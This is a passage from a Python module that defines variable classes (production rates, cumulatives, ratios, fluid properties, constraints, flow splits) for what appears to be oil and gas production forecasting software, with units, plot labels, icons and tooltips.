self._image = ico.water_injection_rate_16x16
self._line_options = LineOptions(label=r'Water Inj. Rate', colour=np.array([91., 155., 213.]) / 255.)
self._plot_label = r'Water Injection Rate'
self._id = 'water_injection_rate'
class TotalGasRate(RateVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._menu_label = 'Total gas production rate'
self._image = ico.total_gas_rate_16x16
self._line_options = LineOptions(label=r'Total Gas Rate', colour=np.array([218., 119., 6.]) / 255.)
self._plot_label = r'Total Gas Production Rate'
self._id = 'total_gas_rate'
# ======================================================================================================================
# Cumulative Production Variables
# ======================================================================================================================
class CumulativeVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._type = 'cumulatives'
self._type_id = ID_CUMULATIVE
class OilCumulative(CumulativeVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeUnit(unit_system)
self._menu_label = 'Cumulative oil production'
self._image = ico.oil_cum_16x16
self._line_options = LineOptions(label=r'Oil Cum.', colour=np.array([0., 134., 61.]) / 255.)
self._plot_label = r'Cumulative Oil Production'
self._id = 'oil_cumulative'
class GasCumulative(CumulativeVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasVolumeUnit(unit_system)
self._menu_label = 'Cumulative gas production'
self._image = ico.gas_cum_16x16
self._line_options = LineOptions(label=r'Gas Cum.', colour=np.array([192., 0., 0.]) / 255.)
self._plot_label = r'Cumulative Gas Production'
self._id = 'gas_cumulative'
class WaterCumulative(CumulativeVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeUnit(unit_system)
self._menu_label = 'Cumulative water production'
self._image = ico.water_cum_16x16
self._line_options = LineOptions(label=r'Water Cum.', colour=np.array([51., 126., 195.]) / 255.)
self._plot_label = r'Cumulative Water Production'
self._id = 'water_cumulative'
class LiquidCumulative(CumulativeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = LiquidVolumeUnit(unit_system)
self._menu_label = 'Cumulative liquid production'
self._image = ico.liquid_cum_16x16
self._line_options = LineOptions(label=r'Liquid Cum.', colour=np.array([51., 63., 79.]) / 255.)
self._plot_label = r'Cumulative Liquid Production'
self._id = 'liquid_cumulative'
class LiftGasCumulative(CumulativeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = GasVolumeUnit(unit_system)
self._menu_label = 'Cumulative lift gas injection'
self._image = ico.lift_gas_cum_16x16
self._line_options = LineOptions(label=r'Lift Gas Cum.', colour=np.array([153., 0., 153.]) / 255.)
self._plot_label = r'Cumulative Lift Gas Injection'
self._id = 'lift_gas_cumulative'
class GasInjectionCumulative(CumulativeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = GasVolumeUnit(unit_system)
self._menu_label = 'Cumulative gas injection'
self._image = ico.gas_injection_cum_16x16
self._line_options = LineOptions(label=r'Gas Inj. Cum.', colour=np.array([192., 0., 0.]) / 255.)
self._plot_label = r'Cumulative Gas Injection'
self._id = 'gas_injection_cumulative'
class WaterInjectionCumulative(CumulativeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = LiquidVolumeUnit(unit_system)
self._menu_label = 'Cumulative Water injection'
self._image = ico.water_injection_cum_16x16
self._line_options = LineOptions(label=r'Water Inj. Cum.', colour=np.array([51., 126., 195.]) / 255.)
self._plot_label = r'Cumulative Water Injection'
self._id = 'water_injection_cumulative'
class TotalGasCumulative(CumulativeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = GasVolumeUnit(unit_system)
self._menu_label = 'Cumulative total gas production'
self._image = ico.total_gas_cum_16x16
self._line_options = LineOptions(label=r'Total Gas Cum.', colour=np.array([218., 119., 6.]) / 255.)
self._plot_label = r'Cumulative Total Gas Production'
self._id = 'total_gas_cumulative'
# ======================================================================================================================
# Ratio Variables
# ======================================================================================================================
class FractionVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., 1.)
self._type = 'ratios'
self._type_id = ID_RATIO
class RatioVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._type = 'ratios'
self._type_id = ID_RATIO
class WaterCut(FractionVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidLiquidRatioUnit(unit_system)
self._menu_label = 'Water-cut'
self._image = ico.water_cut_16x16
self._line_options = LineOptions(label=r'Water-cut', colour=np.array([91., 155., 213.]) / 255.)
self._fitted_options = FittedDataOptions(colour=np.array([217., 83., 25.]) / 255.) # TODO: NOT USED
self._plot_label = r'Water-cut'
self._id = 'water_cut'
class OilCut(FractionVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidLiquidRatioUnit(unit_system)
self._menu_label = 'Oil-cut'
self._image = ico.oil_cut_16x16
self._line_options = LineOptions(label=r'Oil-cut', colour=np.array([0., 176., 80.]) / 255.)
self._fitted_options = FittedDataOptions(colour=np.array([255., 0., 0.]) / 255.)
self._plot_label = r'Oil-cut'
self._id = 'oil_cut'
class GasOilRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasLiquidRatioUnit(unit_system)
self._menu_label = 'Gas-oil ratio'
self._image = ico.gas_oil_ratio_16x16
self._line_options = LineOptions(label=r'GOR', colour=np.array([255., 0., 0.]) / 255.)
self._fitted_options = FittedDataOptions(colour=np.array([122., 48., 160.]) / 255.)
self._plot_label = r'Gas-Oil Ratio'
self._id = 'gas_oil_ratio'
class WaterOilRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidLiquidRatioUnit(unit_system)
self._menu_label = 'Water-oil ratio'
self._image = ico.water_oil_ratio_16x16
self._line_options = LineOptions(label=r'WOR', colour=np.array([91., 155., 213.]) / 255.)
self._plot_label = r'Water-Oil Ratio'
self._id = 'water_oil_ratio'
class GasLiquidRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasLiquidRatioUnit(unit_system)
self._menu_label = 'Gas-liquid ratio'
self._image = ico.gas_liquid_ratio_16x16
self._line_options = LineOptions(label=r'GLR', colour=np.array([255., 0., 0.]) / 255.)
self._plot_label = r'Gas-Liquid Ratio'
self._id = 'gas_liquid_ratio'
class WaterGasRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidGasRatioUnit(unit_system)
self._menu_label = 'Water-gas ratio'
self._image = ico.water_gas_ratio_16x16
self._line_options = LineOptions(label=r'WGR', colour=np.array([91., 155., 213.]) / 255.)
self._plot_label = r'Water-Gas Ratio'
self._id = 'water_gas_ratio'
class OilGasRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidGasRatioUnit(unit_system)
self._menu_label = 'Oil-gas ratio'
self._image = ico.oil_gas_ratio_16x16
self._line_options = LineOptions(label=r'WGR', colour=np.array([0., 176., 80.]) / 255.)
self._plot_label = r'Oil-Gas Ratio'
self._id = 'oil_gas_ratio'
class TotalGasLiquidRatio(RatioVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasLiquidRatioUnit(unit_system)
self._menu_label = 'Total gas-liquid ratio'
self._image = ico.total_gas_liquid_ratio_16x16
self._line_options = LineOptions(label=r'TGLR', colour=np.array([218., 119., 6.]) / 255.)
self._plot_label = r'Total Gas-Liquid Ratio'
self._id = 'total_gas_liquid_ratio'
# ======================================================================================================================
# Uptime Variables
# ======================================================================================================================
class UptimeVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., 1.)
self._type = 'uptimes'
self._type_id = ID_UPTIME
class ProductionUptime(UptimeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = FractionUnit()
self._menu_label = 'Production uptime'
self._image = ico.uptime_16x16
self._line_options = LineOptions(label=r'Prod. uptime', colour=np.array([255., 217., 102.]) / 255.)
self._plot_label = r'Production Uptime'
self._id = 'production_uptime'
class LiftGasUptime(UptimeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = FractionUnit()
self._menu_label = 'Lift gas uptime'
self._image = ico.uptime_16x16
self._line_options = LineOptions(label=r'Lift gas uptime', colour=np.array([255., 217., 102.]) / 255.)
self._plot_label = r'Lift Gas Uptime'
self._id = 'lift_gas_uptime'
class GasInjectionUptime(UptimeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = FractionUnit()
self._menu_label = 'Gas inj. uptime'
self._image = ico.uptime_16x16
self._line_options = LineOptions(label=r'Gas inj. uptime', colour=np.array([255., 217., 102.]) / 255.)
self._plot_label = r'Gas Injection Uptime'
self._id = 'gas_injection_uptime'
class WaterInjectionUptime(UptimeVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = FractionUnit()
self._menu_label = 'Water inj. uptime'
self._image = ico.uptime_16x16
self._line_options = LineOptions(label=r'Water inj. uptime', colour=np.array([255., 217., 102.]) / 255.)
self._plot_label = r'Water Injection Uptime'
self._id = 'water_injection_uptime'
# ======================================================================================================================
# Summary variables (for use on frames)
# ======================================================================================================================
class SummaryFunction(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Function'
self._choices = ('Point', 'Sum', 'Average')
self._choice_images = (ico.specific_point_16x16, ico.specific_point_16x16, ico.specific_point_16x16)
self._pytype = tuple
self._tooltip = 'Function that reduces a temporal production profile to a scalar.'
class SummaryPoint(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Point'
self._choices = ('First', 'Last', 'Date', 'Time')
self._choice_images = (ico.first_point_16x16, ico.last_point_16x16, ico.dates_16x16, ico.time_16x16)
self._pytype = tuple
self._tooltip = 'The specific summary point of the production profile.'
class SummaryPointDate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Date'
self._pytype = date
self._tooltip = 'Date at which to extract summary point.'
class SummaryPointTime(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = 'years'
self._frame_label = 'Time'
self._pytype = float
self._tooltip = 'Time at which to extract summary point.'
class SummaryIcon(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Icon'
self._choices = ('Oil rate', 'Gas rate', 'Water rate', 'Liquid rate', 'Lift gas rate', 'Gas injection rate',
'Water injection rate', 'Total gas rate', 'Oil cumulative', 'Gas cumulative',
'Water cumulative', 'Liquid cumulative', 'Lift gas cumulative', 'Gas injection cumulative',
'Water injection cumulative', 'Total gas cumulative', 'Length', 'HCFT', 'HCPV', 'Permeability')
self._choice_images = (ico.oil_rate_16x16, ico.gas_rate_16x16, ico.water_rate_16x16,
ico.liquid_rate_16x16, ico.lift_gas_rate_16x16, ico.gas_injection_rate_16x16,
ico.water_injection_rate_16x16, ico.total_gas_rate_16x16,
ico.oil_cum_16x16, ico.gas_cum_16x16, ico.water_cum_16x16,
ico.liquid_cum_16x16, ico.lift_gas_cum_16x16, ico.gas_injection_cum_16x16,
ico.water_injection_cum_16x16, ico.total_gas_cum_16x16,
ico.completion_16x16, ico.HCFT_16x16, ico.HCPV_16x16, ico.permeability_16x16)
self._client_data_map = {i: bitmap for i, bitmap in enumerate(self._choice_images)}
self._pytype = tuple
class HistogramFrequency(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = AmountUnit()
self._plot_label = 'Frequency'
self._legend = 'Frequency'
self._limits = (0., None)
# ======================================================================================================================
# Concession Variables
# ======================================================================================================================
class License(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'License'
self._pytype = date
self._type = 'concessions'
self._id = 'license'
# ======================================================================================================================
# Plateau Variables
# ======================================================================================================================
class PlateauVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 1
self._pytype = float
self._type = 'plateaus'
class TargetOilPlateau(PlateauVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Target oil'
self._menu_label = 'Target oil plateau'
self._image = ico.well_spacing_16x16
self._plot_label = r'Target Oil Plateau'
self._legend = r'Oil Plateau'
self._tooltip = 'Target oil plateau used as constraint in prediction.'
self._id = 'target_oil_plateau'
class TargetGasPlateau(PlateauVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._frame_label = 'Target gas'
self._menu_label = 'Target gas plateau'
self._image = ico.well_spacing_16x16
self._plot_label = r'Target Gas Plateau'
self._legend = r'Gas Plateau'
self._tooltip = 'Target gas plateau used as constraint in prediction.'
self._id = 'target_gas_plateau'
# ======================================================================================================================
# Well Variables
# ======================================================================================================================
class ProductionPhase(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Primary phase'
self._choices = ('Oil', 'Gas')
self._pytype = Index
class InjectionPhase(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Injected phase'
self._choices = ('Water', 'Gas', 'WAG')
self._pytype = Index
class DevelopmentLayout(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Layout'
self._image = ico.well_pair_2_16x16
self._choices = (None, 'Line-drive', 'Radial', '5-spot')
self._choice_images = (None, ico.well_pair_2_16x16, ico.radial_pattern_16x16, ico.five_spot_16x16)
self._tooltip = 'Scaling of well spacing is only done on\n' \
'wells/analogues with similar development scheme.'
self._pytype = tuple
class WellSpacing(Variable):
def __init__(self, unit_system):
super().__init__()
self._unit = LengthUnit(unit_system)
self._frame_label = 'Spacing'
self._menu_label = 'Well spacing'
self._image = ico.well_spacing_16x16
self._limits = (0., None)
self._plot_label = r'Well Spacing'
self._legend = r'Spacing'
self._tooltip = 'Used to scale the rate and cumulative production\n' \
'based on the ratio between the spacing of the\n' \
'producer and an analogue.'
self._pytype = int
self._type = 'well_spacing'
self._id = 'spacing'
class History(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Import'
self._pytype = tuple
self._tooltip = 'Profile of historical data:\n' \
'- Browse: Import profile from external file.'
class HistoryFit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Import'
self._pytype = tuple
self._tooltip = 'Profile of historical data:\n' \
'- Browse: Import profile from external file\n' \
'- Window: Fit models to historical data for use in prediction.'
class Cultural(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Import'
self._pytype = tuple
self._tooltip = 'Cultural of the entity:\n' \
'- Field, Block, Reservoir, Theme, Polygon: 2D outline (x, y)\n' \
'- Pipeline: 2D trajectory (x, y)\n' \
'- Platform, Processor: Point (x, y)\n' \
'- Producer, Injector, Analogue: 3D trajectory (x, y, z)'
class Prediction(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Prediction'
self._choices = ('Low', 'Mid', 'High')
self._choice_images = (ico.low_chart_16x16, ico.mid_chart_16x16, ico.high_chart_16x16)
self._pytype = tuple
class ProbabilityOfOccurrence(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = PercentageUnit()
self._frame_label = 'Occurrence'
self._limits = (0., 100.)
self._round_off = 1
self._pytype = float
self._tooltip = 'Probability of the currently selected prediction\n' \
'to be sampled during uncertainty modelling'
# ======================================================================================================================
# Pointer Variables
# ======================================================================================================================
class Analogue(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Analogue'
self._pytype = Pointer
self._tooltip = 'Analogue from which to historical data:\n' \
'- Arrow: Insert Analogue from menu\n' \
'- Window: Create function based on models\n' \
' fitted to historical data.'
class Typecurve(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Typecurve'
self._pytype = Pointer
self._tooltip = 'Profile used for prediction:\n' \
'- Arrow: Insert Typecurve from menu\n' \
'- Browse: Import profile from external file\n' \
'- Window: Create function based on models\n' \
' fitted to historical data.'
class Scaling(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Scaling'
self._pytype = Pointer
self._tooltip = 'Scaling evaluation used for transforming\n' \
'static parameters to scalers:\n' \
'- Arrow: Insert Scaling from menu.'
class Scenario(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Scenario'
self._pytype = Pointer
self._tooltip = 'Scenario from which to gather entities, events and dates:\n' \
'- Arrow: Insert Scenario from menu.'
class HistorySimulation(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'History'
self._pytype = Pointer
self._tooltip = 'History simulation to carry into prediction:\n' \
'- Arrow: Insert History from menu.'
# ======================================================================================================================
# Fluid Variables
# ======================================================================================================================
class FluidVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 2
self._pytype = float
class ReservoirFluidVariable(FluidVariable):
def __init__(self):
super().__init__()
self._type = 'res_fluids'
class InjectionFluidVariable(FluidVariable):
def __init__(self):
super().__init__()
self._type = 'inj_fluids'
class OilFVF(ReservoirFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeRatio(unit_system)
self._frame_label = 'Bo'
self._menu_label = 'Oil FVF'
self._image = ico.Bo_16x16
self._plot_label = r'Oil FVF, $b_o$'
self._legend = r'$b_o$'
self._tooltip = 'Oil formation volume factor.'
self._id = 'bo'
class GasFVF(ReservoirFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasVolumeRatio(unit_system)
self._frame_label = 'Bg'
self._menu_label = 'Gas FVF'
self._image = ico.Bg_16x16
self._plot_label = r'Gas FVF, $b_g$'
self._legend = r'$b_g$'
self._tooltip = 'Gas formation volume factor.'
self._id = 'bg'
class WaterFVF(ReservoirFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeRatio(unit_system)
self._frame_label = 'Bw'
self._menu_label = 'Water FVF'
self._image = ico.Bw_16x16
self._plot_label = r'Water FVF, $b_w$'
self._legend = r'$b_w$'
self._tooltip = 'Water formation volume factor.'
self._id = 'bw'
class SolutionGasOilRatio(ReservoirFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasLiquidRatioUnit(unit_system)
self._frame_label = 'Rs'
self._menu_label = 'Solution GOR'
self._image = ico.Rs_16x16
self._plot_label = r'Solution Gas-Oil Ratio, $R_s$'
self._legend = r'$R_s$'
self._tooltip = 'Solution gas-oil-ratio.'
self._id = 'rs'
class InjectionGasFVF(InjectionFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasVolumeRatio(unit_system)
self._frame_label = 'Bg inj.'
self._menu_label = 'Gas inj. FVF'
self._image = ico.Bg_inj_16x16
self._plot_label = r'Injection Gas FVF, $b_{g,inj}$'
self._legend = r'$b_{g,inj}$'
self._tooltip = 'Injection gas formation volume factor.'
self._id = 'bg_inj'
class InjectionWaterFVF(InjectionFluidVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeRatio(unit_system)
self._frame_label = 'Bw inj.'
self._menu_label = 'Water inj. FVF'
self._image = ico.Bw_inj_16x16
self._plot_label = r'Injection Water FVF, $b_{w,inj}$'
self._legend = r'$b_{w,inj}$'
self._tooltip = 'Injection water formation volume factor.'
self._id = 'bw_inj'
# ======================================================================================================================
# Stakes Variables
# ======================================================================================================================
class Maturity(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Maturity'
self._menu_label = 'Maturity'
self._image = ico.oil_cum_16x16 # TODO: Draw icon
self._limits = (.5, 1.5)
self._plot_label = r'Maturity'
self._legend = r'Maturity'
self._round_off = 2
self._pytype = float
self._tooltip = 'Maturity index between 0.5 to 1.5,\n' \
'low values indicate low maturity and vice versa.'
self._type = 'risking'
self._id = 'maturity'
class ProbabilityOfSuccess(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = PercentageUnit()
self._frame_label = 'PoS'
self._menu_label = 'Probability of success'
self._image = ico.binary_distribution_16x16
self._limits = (0., 100.)
self._plot_label = r'Probability of Success, PoS'
self._legend = r'PoS'
self._round_off = 2
self._pytype = float
self._tooltip = 'Probability of Success is used to include or\n' \
'exclude a well during uncertainty modelling.\n' \
'Weighted average shown for subsurface items.'
self._type = 'risking'
self._id = 'pos'
class STOIIP(Variable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidVolumeUnit(unit_system)
self._frame_label = 'STOIIP'
self._menu_label = 'STOIIP'
self._image = ico.stoiip_16x16
self._limits = (0., None)
self._plot_label = r'STOIIP'
self._legend = r'STOIIP'
self._pytype = int
self._tooltip = 'Stock tank oil initially in place.'
self._type = 'volumes'
self._id = 'stoiip'
# ======================================================================================================================
# Constraint Variables
# ======================================================================================================================
class ConstraintVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 2
self._pytype = float
self._type = 'constraints'
class OilConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Oil flow'
self._menu_label = 'Oil flow con.'
self._image = ico.oil_flow_constraint_16x16
self._plot_label = r'Oil Flow Constraint, $Q_{o,max}$'
self._legend = r'Oil Con.'
self._tooltip = 'Oil flow constraint.'
self._id = 'oil_constraint'
class GasConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._frame_label = 'Gas flow'
self._menu_label = 'Gas flow con.'
self._image = ico.gas_flow_constraint_16x16
self._plot_label = r'Gas Flow Constraint, $Q_{g,max}$'
self._legend = r'Gas Con.'
self._tooltip = 'Gas flow constraint.'
self._id = 'gas_constraint'
class WaterConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Water flow'
self._menu_label = 'Water flow con.'
self._image = ico.water_flow_constraint_16x16
self._plot_label = r'Water Flow Constraint, $Q_{w,max}$'
self._legend = r'Water Con.'
self._tooltip = 'Water flow constraint.'
self._id = 'water_constraint'
class LiquidConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Liquid flow'
self._menu_label = 'liquid flow con.'
self._image = ico.liquid_flow_constraint_16x16
self._plot_label = r'Liquid Flow Constraint, $Q_{l,max}$'
self._legend = r'Liquid Con.'
self._tooltip = 'Liquid flow constraint.'
self._id = 'liquid_constraint'
class InjectionGasConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._frame_label = 'Gas-inj. rate'
self._menu_label = 'Gas-inj. con.'
self._image = ico.gas_injection_constraint_16x16
self._plot_label = r'Gas-Injection Constraint, $Q_{g,inj,max}$'
self._legend = r'Gas-Inj. Con.'
self._tooltip = 'Injection gas constraint.'
self._id = 'gas_inj_constraint'
class InjectionWaterConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Water-inj. rate'
self._menu_label = 'Water-inj. con.'
self._image = ico.water_injection_constraint_16x16
self._plot_label = r'Water-Injection Constraint, $Q_{w,inj,max}$'
self._legend = r'Water-Inj. Con.'
self._tooltip = 'Injection water constraint.'
self._id = 'water_inj_constraint'
class LiftGasConstraint(ConstraintVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._frame_label = 'Gas-lift rate'
self._menu_label = 'Gas-lift con.'
self._image = ico.lift_gas_constraint_16x16
self._plot_label = r'Gas-Lift Constraint, $Q_{g,lift,max}$'
self._legend = r'Gas-Lift Con.'
self._tooltip = 'Lift-gas constraint.'
self._id = 'lift_gas_constraint'
# ======================================================================================================================
# Out-flowing Phase Variables
# ======================================================================================================================
class OilInflow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Oil'
self._pytype = bool
self._tooltip = 'Oil is fed in from the previous node.'
class GasInflow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Gas'
self._pytype = bool
self._tooltip = 'Gas is fed in from the previous node.\n' \
'This is the total gas, i.e. gas from\n' \
'the reservoir and lift-gas.'
class WaterInflow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Water'
self._pytype = bool
self._tooltip = 'Water is fed in from the previous node.'
class InjectionGasInflow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Injection Gas'
self._pytype = bool
self._tooltip = 'Injection gas is fed in from the previous node.'
class InjectionWaterInflow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Injection Water'
self._pytype = bool
self._tooltip = 'Injection water is fed in from the previous node.'
# ======================================================================================================================
# Flow Split Variables
# ======================================================================================================================
class SplitType(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Split type'
self._choices = ('', 'Fixed', 'Multiphasic spill-over', 'Monophasic spill-over', 'Production to injection')
self._choice_images = (None, ico.oil_cum_16x16, ico.fluids_16x16, ico.liquid_cum_16x16, ico.fluids_injection_16x16)
self._tooltip = 'Defines the split-type used in determining\n' \
'how the phases are split.\n' \
'- Fixed: Sends phases to the two nodes based on the fractions given below.\n' \
'- Multiphasic:...'
self._pytype = tuple
class OilSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Oil split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Oil split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
class GasSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Gas split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Gas split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
class WaterSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Water split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Water split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
class LiftGasSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Lift-gas split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Lift-gas split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
class InjectionGasSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Injection gas split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Injection gas split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
class InjectionWaterSplit(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Injection water split'
self._limits = (0., 1.)
self._round_off = 2
self._pytype = float
self._tooltip = 'Injection water split. Fraction goes to step-parent,\n' \
'1-fraction goes to parent.'
# ======================================================================================================================
# Surface Variables
# ======================================================================================================================
class FacilityVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._type = 'facilities'
class TargetGasLiquidRatio(FacilityVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = GasLiquidRatioUnit(unit_system)
self._frame_label = 'Target TGLR'
self._menu_label = 'Target gas-liquid ratio'
self._image = ico.total_gas_liquid_ratio_16x16
self._plot_label = r'Target Gas-Liquid Rate'
self._legend = r'Target TGLR.'
self._round_off = 2
self._pytype = float
self._tooltip = 'Target total gas-liquid-ration used for\n' \
'calculating lift-gas requirements.'
self._id = 'tglr'
class Availability(FacilityVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = FractionUnit()
self._frame_label = 'Availability'
self._menu_label = 'Availability'
self._image = ico.average_uptime_16x16
self._plot_label = r'Availability'
self._legend = r'Availability'
self._round_off = 3
self._pytype = float
self._tooltip = 'Availability applied to production rates and constraints.\n' \
'Individual entity availability not used in simulation, but\n' \
'kept for export to Phaser. Availability listed in History and Prediction is used\n' \
'as an over-all system availability.'
self._id = 'availability'
class WAGCycleDuration(FacilityVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = TimeUnit('days')
self._frame_label = 'Cycle dur.'
self._menu_label = 'WAG cycle duration'
self._image = ico.wag_cycle_duration_16x16
self._plot_label = r'WAG Cycle Duration'
self._legend = r'WAG Cycle'
self._pytype = int
self._tooltip = 'Duration between each change-over from\n' \
'gas to water injection'
self._id = 'wag_cycle'
class WAGCycles(FacilityVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = AmountUnit()
self._frame_label = '# of cycles'
self._menu_label = 'WAG cycles'
self._image = ico.wag_cycles_16x16
self._plot_label = r'Number of WAG Cycles'
self._legend = r'WAG Cycles'
self._pytype = int
self._tooltip = 'Maximum number of change-overs from\n' \
'gas to water injection. Starting with\n' \
'gas and ending with water'
self._id = 'wag_cycles'
class TargetVoidageRatio(FacilityVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = ReservoirVolumeRatio(unit_system)
self._frame_label = 'Target ratio'
self._menu_label = 'Target voidage ratio'
self._image = ico.wag_voidage_replacement_16x16
self._plot_label = r'Target Voidage Replacement Ratio'
self._legend = r'Target Voidage Ratio'
self._round_off = 2
self._pytype = float
self._tooltip = 'Target voidage replacement ratio:\n' \
'- Spreadsheet: Assign proportion of injection\n' \
' going to each supported producer'
self._id = 'voidage'
class VoidageProportion(FacilityVariable):
# used exclusively on the VoidagePanel in PropertyPanels. TargetVoidageRatio handles menu and plotting
def __init__(self, unit_system):
super().__init__()
self._unit = ReservoirVolumeRatio(unit_system)
self._frame_label = 'Target ratio'
self._image = ico.spreadsheet_16x16
self._round_off = 2
self._pytype = float
class GasInjectionPotentialConstant(FacilityVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = GasFlowRateUnit(unit_system)
self._frame_label = 'Gas inj.'
self._menu_label = 'Constant gas inj.'
self._image = ico.gas_injection_rate_16x16
self._limits = (0., None)
self._plot_label = r'Constant gas injection'
self._legend = r'Con. gas inj.'
self._tooltip = 'Set to provide a constant gas injection potential\n' \
'for the well. If this is not set, the required\n' \
'potential will be calculated based on voidage replacement.'
self._pytype = float
self._round_of = 1
self._id = 'constant_gas_inj'
